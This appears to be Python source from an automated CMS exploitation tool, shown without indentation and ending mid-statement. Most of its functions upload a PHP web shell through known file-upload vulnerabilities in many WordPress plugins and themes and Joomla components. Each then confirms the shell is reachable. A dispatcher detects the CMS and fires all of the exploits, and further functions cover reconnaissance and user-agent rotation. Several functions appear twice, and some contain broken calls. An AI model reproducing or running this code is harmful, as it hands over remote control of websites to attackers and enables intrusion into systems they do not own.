def webhosting_info(hostinfo):
print (' %s Web Hosting Information' % (run))
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url)
getinfo = vxget(urldate,headers,timeout)
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date,getinfo)
if matches:
print ( ' %s Domain Created on : %s' % (good,matches.group(1)))
ip = socket.gethostbyname(hostd(url))
print ( ' %s CloudFlare IP : %s' % (good,ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
getipinfo = vxget(ipinfo,headers,timeout)
country = re.search(re.compile(r'country\": \"(.+?)\"'),getipinfo)
region = re.search(re.compile(r'region\": \"(.+?)\"'),getipinfo)
latitude = re.search(re.compile(r'latitude: (.+?)'),getipinfo)
longitude = re.search(re.compile(r'longitude\": \"(.+?)\"'),getipinfo)
timezone = re.search(re.compile(r'timezone\": \"(.+?)\"'),getipinfo)
ans = re.search(re.compile(r'ans\": \"(.+?)\"'),getipinfo)
org = re.search(re.compile(r'org\": \"(.+?)\"'),getipinfo)
if country:
print(' %s Country : %s' % (good,country.group(1)))
if region:
print(' %s Region : %s' % (good,region.group(1)))
if latitude:
print(' %s Latitude : %s' % (good,latitude.group(1)))
if longitude:
print(' %s Longitude : %s' % (good,longitude.group(1)))
if timezone:
print(' %s Timezone : %s' % (good,timezone.group(1)))
if ans:
print(' %s Ans : %s' % (good,ans.group(1)))
if org:
print(' %s Org : %s' % (good,org.group(1)))
print ("-----------------------------------------------")
def joomla_comjdownloads2(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/images/jdownloads/screenshots/VulnX.php"
headers = {"content-type": ["form-data"]}
files = open('./shell/VulnX.zip', 'rb')
shell = open('./shell/VulnX.gif', 'rb')
data = {
'name': 'Tig',
'mail': '*****@*****.**',
'filetitle': 'Tig',
'catlist': '1',
'license': '0',
'language': '0',
'system': '0',
'file_upload': files,
'pic_upload': shell,
'description': '<p>zot</p>',
'senden': 'Send file',
'option': 'com_jdownloads',
'view': 'upload',
'send': '1',
'24c22896d6fe6977b731543b3e44c22f': '1'
}
response = vxget(endpoint, headers, timeout)
if re.findall(r'200', response):
print(' %s Com Jdownloads2 %s %s' %
(que, vulnexploit, endpoint))
else:
print(' %s Com Jdownloads2 %s' % (que, failexploit))
def wp_wysija(url, headers, timeout, vulnresults):
theme = "my-theme"
endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
headers['Content_Type'] = 'form-data'
options = {
'theme': shell,
'overwriteexistingtheme': 'on',
'action': 'themeupload',
'submitter': 'Upload'
}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, timeout)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print(' %s Wysija Newsletters %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data)
else:
print(' %s Wysija Newsletters %s' % (que, failexploit))
vulnresults.add('[FAILED] Wysija Newsletters')
def wp_wysija(url, headers):
theme = "my-theme"
endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
headers['Content_Type'] = 'form-data'
options = {
'theme': shell,
'overwriteexistingtheme': 'on',
'action': 'themeupload',
'submitter': 'Upload'
}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print('%s [%s+%s] Wysija Newsletters%s -------------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Wysija Newsletters%s -------------- %s FAIL%s' %
(W, R, W, W, R, W))
def joomla_foxcontact(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
# foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
# 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
# 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
# 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
headers = {"content-type": ["form-data"]}
fieldname = 'file'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Fox Contact %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s fox Contact %s' % (que, failexploit))
def wp_showbiz(url, headers, timeout, vulnresults):
endpoint = url + "/wp-admin/admin-ajax.php"
#method to randomize the user agent [functionINfunction]
def random_UserAgent():
useragents_rotate = [
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
]
useragents_random = random.choice(useragents_rotate)
return useragents_random
useragent = random_UserAgent()
headers['User-Agent'] = useragent
headers['Content_Type'] = 'multipart/form-data'
options = {
"action": "showbiz_ajax_action",
"client_action": "update_plugin",
"update_file": [open('./shell/VulnX.php', 'rb')]
}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
res = vxget(dump_data, options)
check_showbiz = re.findall("Vuln X", res)
if check_showbiz:
print(' %s Showbiz Pro %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data)
else:
print(' %s Showbiz Pro %s' % (que, failexploit))
vulnresults.add('[FAILED] Showbiz Pro')
def drupal_version():
response = vxget(url, headers, timeout)
regex = 'Drupal \d{0,10}'
regex = re.compile(regex)
matches = regex.findall(response)
if len(matches) > 0 and matches[0] != None and matches[0] != "":
version = matches[0]
print('%s [+] Drupal Version : %s %s' % (G, version, W))
def prestashop_version():
response = vxget(url, headers, timeout)
regex = 'Prestashop \d{0,9}'
regex = re.compile(regex)
matches = regex.findall(response.text)
if len(matches) > 0 and matches[0] != None and matches[0] != "":
version = matches[0]
return print('%s [+] Prestashop Version : %s %s' % (G, version, W))
def webhosting_info():
print('%s [~] Web Hosting Information %s' % (Y, W))
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url)
getinfo = vxget(urldate, headers, 3)
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date, getinfo)
if matches:
print('%s [*] Domain Created on : %s' % (B, matches.group(1)))
ip = socket.gethostbyname(hostd(url))
print('%s [*] CloudFlare IP : %s' % (B, ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
getipinfo = vxget(ipinfo, headers, 3)
country = re.search(re.compile(r'country\": \"(.+?)\"'), getipinfo)
region = re.search(re.compile(r'region\": \"(.+?)\"'), getipinfo)
if country:
print('%s [*] Country : %s' % (B, country.group(1)))
if region:
print('%s [*] Region : %s' % (B, region.group(1)))
def wp_dm(url, headers, timeout, vulnresults):
headers['Content_Type']: 'multipart/form-data'
options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
send_shell = vxpost(url, options, headers, timeout)
dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, timeout)
check_dm = re.findall("Vuln X", content)
if check_dm:
print(' %s Download Manager %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data)
else:
print(' %s Download Manager %s' % (que, failexploit))
vulnresults.add('[FAILED] Download Manager')
def wp_dm(url, headers):
headers['Content_Type']: 'multipart/form-data'
options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
send_shell = vxpost(url, options, headers, 3)
dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, 3)
check_dm = re.findall("Vuln X", content)
if check_dm:
print('%s [%s+%s] Download Manager %s---- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Download Manager %s --- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_cherry(url, headers, timeout, vulnresults):
headers['Content_Type']: 'multipart/form-data'
options = {'file': open('./shell/VulnX.php', 'rb')}
endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
response = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, timeout)
check_cherry = re.findall("Vuln X", content)
if check_cherry:
print(' %s CherryFramework %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data)
else:
print(' %s CherryFramework %s' % (que, failexploit))
vulnresults.add('[FAILED] CherryFramework')
def wp_cherry(url, headers):
headers['Content_Type']: 'multipart/form-data'
options = {'file': open('./shell/VulnX.php', 'rb')}
endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
response = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, 3)
check_cherry = re.findall("Vuln X", content)
if check_cherry:
print('%s [%s+%s] CherryFramework%s ------------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*]Shell Uploaded Successfully \n %s link : %s%s ' %
(B, W, dump_data, W))
else:
print('%s [%s-%s] CherryFramework%s ------------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_adblockblocker(url,headers,timeout,vulnresults):
endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
shell = open('./shell/VulnX.php','rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'popimg':shell,
}
send_shell = vxpost(endpoint,options,headers,timeout)
dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X"
res=vxget(dump_data, headers,timeout)
if re.findall("Vuln X", res):
print (' %s adblockblocker %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data)
else:
print (' %s adblockblocker %s' %(que , failexploit))
vulnresults.add('[FAILED] adblockblocker')
def wp_adsmanager(url, headers, timeout, vulnresults):
endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
res = vxget(dump_data, headers, timeout)
check_adsmanager = re.findall("{\"status\":\"success\"}", res)
if check_adsmanager:
print(' %s Simple Ads Manager %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data)
else:
print(' %s Simple Ads Manager %s' % (que, failexploit))
vulnresults.add('[FAILED] Simple Ads Manager')
def wp_shop(url, headers, timeout, vulnresults):
endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, timeout)
check_shop = re.findall("Vuln X", res)
if check_shop:
print(' %s WPshop eCommerce %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data)
else:
print(' %s WPshop eCommerce %s' % (que, failexploit))
vulnresults.add('[FAILED] WPshop eCommerce')
def wp_inboundiomarketing(url,headers,timeout,vulnresults):
endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
shell = open('./shell/VulnX.php','rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'file':shell,
}
send_shell = vxpost(endpoint,options,headers,timeout)
dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
res=vxget(dump_data, headers,timeout)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print (' %s InBoundio Marketing %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data)
else:
print (' %s InBoundio Marketing %s' %(que , failexploit))
vulnresults.add('[FAILED] InBoundio Marketing')
def wp_adblockblocker(url, headers):
endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
shell = open('./shell/VulnX.php', 'rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'popimg': shell,
}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/" + year + "/" + month + "/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
if re.findall("Vuln X", res):
print('%s [%s+%s] adblockblocker%s ------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] adblockblocker%s ------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_shop(url, headers):
endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_shop = re.findall("Vuln X", res)
if check_shop:
print('%s [%s+%s] WPshop eCommerce%s ------------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] WPshop eCommerce%s ------------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_adsmanager(url, headers):
endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
res = vxget(dump_data, headers, 3)
check_adsmanager = re.findall("{\"status\":\"success\"}", res)
if check_adsmanager:
print('%s [%s+%s] Simple Ads Manager%s -------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Simple Ads Manager%s -------- %s FAIL%s' %
(W, R, W, W, R, W))
def domain_info():
print('%s [~] Search for SubDomains %s' % (Y, W))
searchurl = "https://www.pagesinventory.com/search/?s=" + url
getinfo = vxget(searchurl, headers, 3)
domains = []
#searching domain from pages inventory
matches_domain = re.findall(
re.compile(r'<td><a href=\"\/domain\/(.*?).html\">'), getinfo)
match_ip = re.findall(re.compile(r'<a href=\"/ip\/(.*?).html\">'), getinfo)
for domain in matches_domain:
if domain not in domains:
domains.append(domain)
print('%s [*] SubDomains : %s %s' %
(B, " \n [*] SubDomains : ".join(domains), W))
if match_ip and len(
match_ip) > 0 and match_ip[0] != None and match_ip[0] != "":
IP = match_ip[0]
print('%s [*] IP : %s %s' % (B, IP, W))
def joomla_comedia(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
headers = {"content-type": ["form-data"]}
fieldname = 'Filedata[]'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Com Media %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Media %s' % (que, failexploit))
def joomla_fabrik2_d(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
headers = {"content-type": ["form-data"]}
fieldname = 'file'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Com Fabrik2 %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Fabrik2 %s' % (que, failexploit))
def wp_inboundiomarketing(url, headers):
endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
shell = open('./shell/VulnX.php', 'rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'file': shell,
}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print('%s [%s+%s] InBoundio Marketing%s ------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] InBoundio Marketing%s ------- %s FAIL%s' %
(W, R, W, W, R, W))
def domain_info(subdomains):
print (' %s Search for SubDomains' % (run))
searchurl = "https://www.pagesinventory.com/search/?s=" + url
getinfo = vxget(searchurl,headers,timeout)
domains = []
#searching domain from pages inventory
matches_domain = re.findall(re.compile(r'<td><a href=\"\/domain\/(.*?).html\">'),getinfo)
match_ip = re.findall(re.compile(r'<a href=\"/ip\/(.*?).html\">'),getinfo)
if len(matches_domain) > 0:
for domain in matches_domain:
if domain not in domains:
domains.append(domain)
subdomains.add('domain : '+domain)
print (' %s SubDomains : %s ' %(good," \n ".join(domains)))
if match_ip and len(match_ip) > 0 and match_ip[0] != None and match_ip[0] != "":
IP = match_ip[0]
print (' %s IP : %s' %(good,IP))
subdomains.add('ip : '+IP)
print ("-----------------------------------------------")
def wp_synoptic(url, headers, timeout, vulnresults):
endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
#shell directory
shell = open('./shell/VulnX.php', 'rb')
field = "qqfile"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, timeout)
check_synoptic = re.findall("Vuln X", res)
if check_synoptic:
print(' %s Synoptic %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data)
else:
print(' %s Synoptic %s' % (que, failexploit))
vulnresults.add('[FAILED] Synoptic')
def wp_synoptic(url, headers):
endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
#shell directory
shell = open('./shell/VulnX.php', 'rb')
field = "qqfile"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_synoptic = re.findall("Vuln X", res)
if check_synoptic:
print('%s [%s+%s] Synoptic%s ----------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Synoptic%s ----------- %s FAIL%s' %
(W, R, W, W, R, W))
def joomla_comjce(url, headers):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
data = {
'upload-dir': './../../',
'upload-overwrite': 0,
'Filedata': [open('./shell/VulnX.gif', 'rb')],
'action': 'Upload'
}
content = vxpost(endpoint, data, headers, 15)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect(url, 80)
path_shell = url + "/VulnX.gif"
res = vxget(path_shell, headers, 3)
if re.findall(r'/image/gif/', res):
print('%s [%s+%s] Com Jce%s ------- %s VULN%s' % (W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, path_shell, W))
else:
print('%s [%s-%s] Com Jce%s ------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_showbiz(url, headers):
endpoint = url + "/wp-admin/admin-ajax.php"
#method to randomize the user agent [functionINfunction]
def random_UserAgent():
useragents_rotate = [
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
]
useragents_random = random.choice(useragents_rotate)
return useragents_random
useragent = random_UserAgent()
headers['User-Agent'] = useragent
headers['Content_Type'] = 'multipart/form-data'
options = {
"action": "showbiz_ajax_action",
"client_action": "update_plugin",
"update_file": [open('./shell/VulnX.php', 'rb')]
}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
res = vxget(dump_data, options)
check_showbiz = re.findall("Vuln X", res)
if check_showbiz:
print('%s [%s+%s] Showbiz Pro%s ------------ %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Showbiz Pro%s ------------ %s FAIL%s' %
(W, R, W, W, R, W))
def detect_cms():
id = 0
lm = url + '/smiley/1.gif'
lm_content = vxget(lm, headers)
lm2 = url + '/rss.xml'
lm2_content = vxget(lm2, headers)
content = vxget(url, headers)
# try:
############################
# #
# joomla #
# #
############################
#joomla searching content to detect.
if re.search(
re.compile(
r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'
), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s %sCMS :%s Joomla' % (good, W, end))
print('------------------------------------------------')
#webinfo gathering argument
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
prestashop_version()
#port to scan
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
#joomla_exploits imported from folder[./common/joomla_exploits.py]
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
joomla_comjce(url, headers, timeout)
joomla_comedia(url, headers, timeout)
joomla_comjdownloads(url, headers, timeout)
joomla_comjdownloads2(url, headers, timeout)
joomla_fabrik2(url, headers, timeout)
joomla_fabrik2_d(url, headers, timeout)
joomla_foxcontact(url, headers, timeout)
############################
# #
# Wordpress #
# #
############################
#wordpress searching content to detect.
elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s %sCMS :%s Wordpress' % (good, W, end))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
if domaininfo:
domain_info(subdomains)
#wp_grab methods info from (folder)[./common/grapwp.py]
if cms == 'version':
print(' %s Check CMS Info' % (run))
wp_version(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'themes':
print(' %s Check CMS Info' % (run))
wp_themes(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'user':
print(' %s Check CMS Info' % (run))
wp_user(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'plugins':
print(' %s Check CMS Info' % (run))
wp_plugin(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'all':
print(' %s Check CMS Info' % (run))
wp_version(url, headers, grabinfo)
wp_themes(url, headers, grabinfo)
wp_user(url, headers, grabinfo)
wp_plugin(url, headers, grabinfo)
print("-----------------------------------------------")
#port to scan
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %sPORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
# vulnx -u http://example.com -e | vulnx -u http://example --exploit
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
#wp_exploit methods from (dolder)[./common/wp_exploits.py]
wp_wysija(url, headers, timeout, vulnresults)
wp_blaze(url, headers, timeout, vulnresults)
wp_synoptic(url, headers, timeout, vulnresults)
wp_catpro(url, headers, timeout, vulnresults)
wp_cherry(url, headers, timeout, vulnresults)
wp_dm(url, headers, timeout, vulnresults)
wp_fromcraft(url, headers, timeout, vulnresults)
wp_jobmanager(url, headers, timeout, vulnresults)
wp_showbiz(url, headers, timeout, vulnresults)
wp_shop(url, headers, timeout, vulnresults)
wp_powerzoomer(url, headers, timeout, vulnresults)
wp_revslider(url, headers, timeout, vulnresults)
wp_adsmanager(url, headers, timeout, vulnresults)
wp_inboundiomarketing(url, headers, timeout, vulnresults)
wp_adblockblocker(url, headers, timeout, vulnresults)
wp_levoslideshow(url, headers, timeout, vulnresults)
print("-----------------------------------------------")
############################
# #
# Drupal #
# #
############################
#drupal searching content to detect.
elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Drupal' % (good))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
drupal_version()
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# Prestashop #
# #
############################
#prestashop searching content to detect.
elif re.search(re.compile(r'Prestashop|prestashop'), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s %sCMS :%s Prestashop' % (good, W, end))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
prestashop_version()
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# OpenCart #
# #
############################
#opencart searching content to detect.
elif re.search(
re.compile(
